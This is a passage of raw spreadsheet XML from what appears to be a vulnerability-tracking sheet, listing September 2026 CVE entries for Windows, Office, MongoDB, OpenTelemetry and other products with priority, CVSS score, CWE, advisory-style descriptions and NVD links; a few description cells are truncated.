s="5" t="inlineStr" /><c r="J1018" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1018" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1018" s="5" t="inlineStr" /><c r="M1018" s="5" t="inlineStr" /><c r="N1018" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1018" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1018" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1018" s="5" t="inlineStr" /><c r="R1018" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1018" s="5" t="inlineStr"><is><t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1018" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t></is></c></row><row r="1019"><c r="A1019" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1019" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1019" s="5" t="inlineStr"><is><t>CVE-2026-78464</t></is></c><c r="D1019" s="5" t="n"><v>7</v></c><c r="E1019" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1019" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1019" s="5" t="inlineStr" /><c r="H1019" s="5" t="n"><v>0.002</v></c><c r="I1019" s="5" t="inlineStr" /><c r="J1019" s="5" t="inlineStr" /><c r="K1019" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1019" s="5" t="inlineStr" /><c r="M1019" s="5" t="inlineStr" /><c r="N1019" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1019" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1019" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1019" s="5" t="inlineStr" /><c r="R1019" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1019" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T1019" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t></is></c></row><row r="1020"><c r="A1020" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1020" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1020" s="5" t="inlineStr"><is><t>CVE-2026-80093</t></is></c><c r="D1020" s="5" t="n"><v>7</v></c><c r="E1020" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1020" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1020" s="5" t="inlineStr" /><c r="H1020" s="5" t="n"><v>0.003</v></c><c r="I1020" s="5" t="inlineStr" /><c r="J1020" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1020"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20" s="5" t="inlineStr" /><c r="M1020" s="5" t="inlineStr" /><c r="N1020" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1020" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1020" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1020" s="5" t="inlineStr" /><c r="R1020" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1020" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1020" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t></is></c></row><row r="1021"><c r="A1021" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1021" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1021" s="5" t="inlineStr"><is><t>CVE-2026-81192</t></is></c><c r="D1021" s="5" t="n"><v>7</v></c><c r="E1021" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1021" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1021" s="5" t="inlineStr" /><c r="H1021" s="5" t="n"><v>0.001</v></c><c r="I1021" s="5" t="inlineStr" /><c r="J1021" s="5" t="inlineStr" /><c r="K1021" s="5" t="inlineStr" /><c r="L1021" s="5" t="inlineStr" /><c r="M1021" s="5" t="inlineStr" /><c r="N1021" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1021" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1021" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1021" s="5" t="inlineStr" /><c r="R1021" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1021" s="5" t="inlineStr"><is><t>`OpenTelemetry.Resources.Host` NuGet package, which provides OpenTelemetry resource detectors for host, is affected by an untrusted search path vulnerability on macOS. Prior to version 1.16.0-beta.2, the `host.id` resource attribute detector launches the `sh` and `ioreg` executables by bare name rather than by absolute path, so both are resolved through the `PATH` environment variable. A local attacker who is less privileged than the host application, and who can influence `PATH` or write to a directory that appears in `PATH` ahead of the system directories, can have an arbitrary binary executed in the application's security context, resulting in local code execution/privilege escalation. This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected. Version 1.16.0-beta.2 contains a patch. No known workarounds are available.</t></is></c><c r="T1021" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t></is></c></row><row r="1022"><c r="A1022" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1022" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1022" s="5" t="inlineStr"><is><t>CVE-2026-81389</t></is></c><c r="D1022" s="5" t="n"><v>7</v></c><c r="E1022" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1022" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1022" s="5" t="inlineStr" /><c r="H1022" s="5" t="n"><v>0.004</v></c><c r="I1022" s="5" t="inlineStr" /><c r="J1022" s="5" t="inlineStr" /><c r="K1022" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1022" s="5" t="inlineStr" /><c r="M1022" s="5" t="inlineStr" /><c r="N1022" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1022" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1022" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1022" s="5" t="inlineStr" /><c r="R1022" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1022" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T1022" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t></is></c></row><row r="1023"><c r="A1023" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1023" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1023" s="5" t="inlineStr"><is><t>CVE-2026-82062</t></is></c><c r="D1023" s="5" t="n"><v>7</v></c><c r="E1023" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1023" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1023" s="5" t="inlineStr" /><c r="H1023" s="5" t="n"><v>0.004</v></c><c r="I1023" s="5" t="inlineStr" /><c r="J1023" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1023" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1023" s="5" t="inlineStr" /><c r="M1023" s="5" t="inlineStr" /><c r="N1023" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1023" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1023" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1023" s="5" t="inlineStr" /><c r="R1023" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1023" s="5" t="inlineStr"><is><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is></c><c r="T1023" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t></is></c></row><row r="1024"><c r="A1024" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1024" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1024" s="5" t="inlineStr"><is><t>CVE-2026-83940</t></is></c><c r="D1024" s="5" t="n"><v>7</v></c><c r="E1024" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1024" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1024" s="5" t="inlineStr" /><c r="H1024" s="5" t="n"><v>0.002</v></c><c r="I1024" s="5" t="inlineStr" /><c r="J1024" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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24" s="5" t="inlineStr" /><c r="M1024" s="5" t="inlineStr" /><c r="N1024" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1024" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1024" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1024" s="5" t="inlineStr" /><c r="R1024" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1024" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1024" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t></is></c></row><row r="1025"><c r="A1025" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1025" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1025" s="5" t="inlineStr"><is><t>CVE-2026-83999</t></is></c><c r="D1025" s="5" t="n"><v>7</v></c><c r="E1025" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1025" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1025" s="5" t="inlineStr" /><c r="H1025" s="5" t="n"><v>0.002</v></c><c r="I1025" s="5" t="inlineStr" /><c r="J1025" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1025" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1025" s="5" t="inlineStr" /><c r="M1025" s="5" t="inlineStr" /><c r="N1025" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1025" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1025" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1025" s="5" t="inlineStr" /><c r="R1025" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1025" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1025" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t></is></c></row><row r="1026"><c r="A1026" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1026" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1026" s="5" t="inlineStr"><is><t>CVE-2026-85360</t></is></c><c r="D1026" s="5" t="n"><v>7</v></c><c r="E1026" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1026" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1026" s="5" t="inlineStr" /><c r="H1026" s="5" t="n"><v>0.002</v></c><c r="I1026" s="5" t="inlineStr" /><c r="J1026" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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26" s="5" t="inlineStr" /><c r="M1026" s="5" t="inlineStr" /><c r="N1026" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1026" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1026" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1026" s="5" t="inlineStr" /><c r="R1026" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1026" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1026" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t></is></c></row><row r="1027"><c r="A1027" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1027" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1027" s="5" t="inlineStr"><is><t>CVE-2026-86135</t></is></c><c r="D1027" s="5" t="n"><v>7</v></c><c r="E1027" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1027" s="5" t="inlineStr"><is><t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t></is></c><c r="G1027" s="5" t="inlineStr" /><c r="H1027" s="5" t="n"><v>0.002</v></c><c r="I1027" s="5" t="inlineStr" /><c r="J1027" s="5" t="inlineStr" /><c r="K1027" s="5" t="inlineStr" /><c r="L1027" s="5" t="inlineStr" /><c r="M1027" s="5" t="inlineStr" /><c r="N1027" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1027" s="5" t="inlineStr" /><c r="R1027" s="5" t="inlineStr"><is><t>CWE-352, CWE-400</t></is></c><c r="S1027" s="5" t="inlineStr"><is><t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t></is></c><c r="T1027" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t></is></c></row><row r="1028"><c r="A1028" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1028" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1028" s="5" t="inlineStr"><is><t>CVE-2026-53933</t></is></c><c r="D1028" s="5" t="n"><v>6.9</v></c><c r="E1028" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1028" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1028" s="5" t="inlineStr" /><c r="H1028" s="5" t="n"><v>0.003</v></c><c r="I1028" s="5" t="inlineStr" /><c r="J1028" s="5" t="inlineStr" /><c r="K1028" s="5" t="inlineStr" /><c r="L1028" s="5" t="inlineStr" /><c r="M1028" s="5" t="inlineStr" /><c r="N1028" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1028" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1028" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1028" s="5" t="inlineStr" /><c r="R1028" s="5" t="inlineStr"><is><t>CWE-203</t></is></c><c r="S1028" s="5" t="inlineStr"><is><t>Maravel, a PHP framework oriented towards dependency injection, prior to version 10.73.1 has a side-channel information disclosure issue. When a route was compiled with dynamic placeholders (e.g., `/api/v1/users/{id}`), the raw string placeholder key was mistakenly registered into the flat static route checklist. An attacker scanning endpoints could intentionally pass the literal template syntax (e.g., `GET /api/v1/users/{id}`) to force an unexpected match against the static map. Because the dynamic tree engine was bypassed, no arguments were captured. This forced modern PHP 8+ versions to throw a native `ArgumentCountError`, resulting in a 500 Internal Server Error instead of a uniform 404 Not Found. By tracking which fuzz patterns exploded into a 500 error, a malicious actor could programmatically profile and map out internal route parameter names and controller schemas. Version 10.73.1 contains a patch. As a workaround, mitigate this side-channel leak by implementing a defensive check in a global middleware. This will reject any literal brace patterns before they reach the router engine.</t></is></c><c r="T1028" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53933</t></is></c></row><row r="1029"><c r="A1029" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1029" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1029" s="5" t="inlineStr"><is><t>CVE-2026-62652</t></is></c><c r="D1029" s="5" t="n"><v>6.9</v></c><c r="E1029" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1029" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G1029" s="5" t="inlineStr" /><c r="H1029" s="5" t="n"><v>0.002</v></c><c r="I1029" s="5" t="inlineStr" /><c r="J1029" s="5" t="inlineStr" /><c r="K1029" s="5" t="inlineStr" /><c r="L1029" s="5" t="inlineStr" /><c r="M1029" s="5" t="inlineStr" /><c r="N1029" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1029" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1029" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1029" s="5" t="inlineStr" /><c r="R1029" s="5" t="inlineStr"><is><t>CWE-215</t></is></c><c r="S1029" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The device firmware contains binaries from which debugging symbols have not been removed. This could allow an unauthenticated attacker with access to the publicly available firmware update files to more easily reverse engineer the device's firmware, facilitating the identification of further vulnerabilities.</t></is></c><c r="T1029" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62652</t></is></c></row><row r="1030"><c r="A1030" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1030" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1030" s="5" t="inlineStr"><is><t>CVE-2026-81531</t></is></c><c r="D1030" s="5" t="n"><v>6.9</v></c><c r="E1030" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1030" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G1030" s="5" t="inlineStr" /><c r="H1030" s="5" t="n"><v>0.004</v></c><c r="I1030" s="5" t="inlineStr" /><c r="J1030" s="5" t="inlineStr" /><c r="K1030" s="5" t="inlineStr" /><c r="L1030" s="5" t="inlineStr" /><c r="M1030" s="5" t="inlineStr" /><c r="N1030" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1030" s="5" t="inlineStr" /><c r="R1030" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S1030" s="5" t="inlineStr"><is><t>An information
disclosure vulnerability has been identified in Omada Controller.  An API endpoint intended for Controller initialization
remains accessible after completion and may disclose account-related
information to unauthenticated remote users. 






Successful
exploitation may allow an attacker to remote query the affected endpoint that
may facilitate user enumeration and subsequent attacks targeting administrative
accounts.</t></is></c><c r="T1030" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81531</t></is></c></row><row r="1031"><c r="A1031" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1031" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1031" s="5" t="inlineStr"><is><t>CVE-2026-81823</t></is></c><c r="D1031" s="5" t="n"><v>6.9</v></c><c r="E1031" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1031" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1031" s="5" t="inlineStr" /><c r="H1031" s="5" t="n"><v>0.002</v></c><c r="I1031" s="5" t="inlineStr" /><c r="J1031" s="5" t="inlineStr" /><c r="K1031" s="5" t="inlineStr" /><c r="L1031" s="5" t="inlineStr" /><c r="M1031" s="5" t="inlineStr" /><c r="N1031" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1031" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1031" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1031" s="5" t="inlineStr" /><c r="R1031" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1031" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow an unauthenticated miscreant to perform read operations intended only for PIMBoards users, resulting in information disclosure. Write operations are not impacted.</t></is></c><c r="T1031" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81823</t></is></c></row><row r="1032"><c r="A1032" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1032" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1032" s="5" t="inlineStr"><is><t>CVE-2026-86804</t></is></c><c r="D1032" s="5" t="n"><v>6.9</v></c><c r="E1032" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1032" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1032" s="5" t="inlineStr" /><c r="H1032" s="5" t="n"><v>0.004</v></c><c r="I1032" s="5" t="inlineStr" /><c r="J1032" s="5" t="inlineStr" /><c r="K1032" s="5" t="inlineStr" /><c r="L1032" s="5" t="inlineStr" /><c r="M1032" s="5" t="inlineStr" /><c r="N1032" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1032" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1032" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1032" s="5" t="inlineStr" /><c r="R1032" s="5" t="inlineStr"><is><t>CWE-266, CWE-285</t></is></c><c r="S1032" s="5" t="inlineStr"><is><t>A vulnerability was identified in seakee CPA-Manager-Plus up to 1.11.10. This vulnerability affects the function CPAResource of the file apps/manager-server/internal/http/controller/proxy/handler.go of the component HTTP Handler. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. Upgrading to version 1.11.11 is able to resolve this issue. The identifier of the patch is 842eec791377ddcbea5cd639bc065eaa4801d656. It is suggested to upgrade the affected component.</t></is></c><c r="T1032" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86804</t></is></c></row><row r="1033"><c r="A1033" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1033" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1033" s="5" t="inlineStr"><is><t>CVE-2026-86810</t></is></c><c r="D1033" s="5" t="n"><v>6.9</v></c><c r="E1033" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1033" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1033" s="5" t="inlineStr" /><c r="H1033" s="5" t="n"><v>0.007</v></c><c r="I1033" s="5" t="inlineStr" /><c r="J1033" s="5" t="inlineStr" /><c r="K1033" s="5" t="inlineStr" /><c r="L1033" s="5" t="inlineStr" /><c r="M1033" s="5" t="inlineStr" /><c r="N1033" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1033" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1033" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1033" s="5" t="inlineStr" /><c r="R1033" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1033" s="5" t="inlineStr"><is><t>A vulnerability was detected in Open-Web-Analytics up to 1.9.1. The impacted element is the function checkCapabilityAndAuthenticateUser of the file Core/Controller.php of the component Controller. Performing a manipulation results in improper authentication. The attack may be initiated remotely. Upgrading to version 1.10.0 is sufficient to resolve this issue. The patch is named 6fc91c49eebdb8bfdfeed71cb50a5d97eac70f24. It is advisable to upgrade the affected component.</t></is></c><c r="T1033" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86810</t></is></c></row><row r="1034"><c r="A1034" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1034" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1034" s="5" t="inlineStr"><is><t>CVE-2026-65812</t></is></c><c r="D1034" s="5" t="n"><v>6.8</v></c><c r="E1034" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1034" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1034" s="5" t="inlineStr" /><c r="H1034" s="5" t="n"><v>0.005</v></c><c r="I1034" s="5" t="inlineStr" /><c r="J1034" s="5" t="inlineStr" /><c r="K1034" s="5" t="inlineStr" /><c r="L1034" s="5" t="inlineStr" /><c r="M1034" s="5" t="inlineStr" /><c r="N1034" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1034" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1034" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1034" s="5" t="inlineStr" /><c r="R1034" s="5" t="inlineStr"><is><t>CWE-201</t></is></c><c r="S1034" s="5" t="inlineStr"><is><t>Insertion of sensitive information into sent data in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1034" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65812</t></is></c></row><row r="1035"><c r="A1035" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1035" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1035" s="5" t="inlineStr"><is><t>CVE-2026-68833</t></is></c><c r="D1035" s="5" t="n"><v>6.8</v></c><c r="E1035" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1035" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1035" s="5" t="inlineStr" /><c r="H1035" s="5" t="n"><v>0.003</v></c><c r="I1035" s="5" t="inlineStr" /><c r="J1035" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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5" s="5" t="inlineStr" /><c r="M1035" s="5" t="inlineStr" /><c r="N1035" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1035" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1035" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1035" s="5" t="inlineStr" /><c r="R1035" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1035" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1035" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t></is></c></row><row r="1036"><c r="A1036" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1036" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1036" s="5" t="inlineStr"><is><t>CVE-2026-69415</t></is></c><c r="D1036" s="5" t="n"><v>6.8</v></c><c r="E1036" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1036" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1036" s="5" t="inlineStr" /><c r="H1036" s="5" t="n"><v>0.007</v></c><c r="I1036" s="5" t="inlineStr" /><c r="J1036" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1036" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1036" s="5" t="inlineStr" /><c r="M1036" s="5" t="inlineStr" /><c r="N1036" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1036" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1036" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1036" s="5" t="inlineStr" /><c r="R1036" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1036" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T1036" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t></is></c></row><row r="1037"><c r="A1037" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1037" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1037" s="5" t="inlineStr"><is><t>CVE-2026-69490</t></is></c><c r="D1037" s="5" t="n"><v>6.8</v></c><c r="E1037" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1037" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1037" s="5" t="inlineStr" /><c r="H1037" s="5" t="n"><v>0.004</v></c><c r="I1037" s="5" t="inlineStr" /><c r="J1037" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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7" s="5" t="inlineStr" /><c r="M1037" s="5" t="inlineStr" /><c r="N1037" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1037" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1037" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1037" s="5" t="inlineStr" /><c r="R1037" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1037" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1037" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t></is></c></row><row r="1038"><c r="A1038" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1038" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1038" s="5" t="inlineStr"><is><t>CVE-2026-69566</t></is></c><c r="D1038" s="5" t="n"><v>6.8</v></c><c r="E1038" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1038" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1038" s="5" t="inlineStr" /><c r="H1038" s="5" t="n"><v>0.004</v></c><c r="I1038" s="5" t="inlineStr" /><c r="J1038" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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8" s="5" 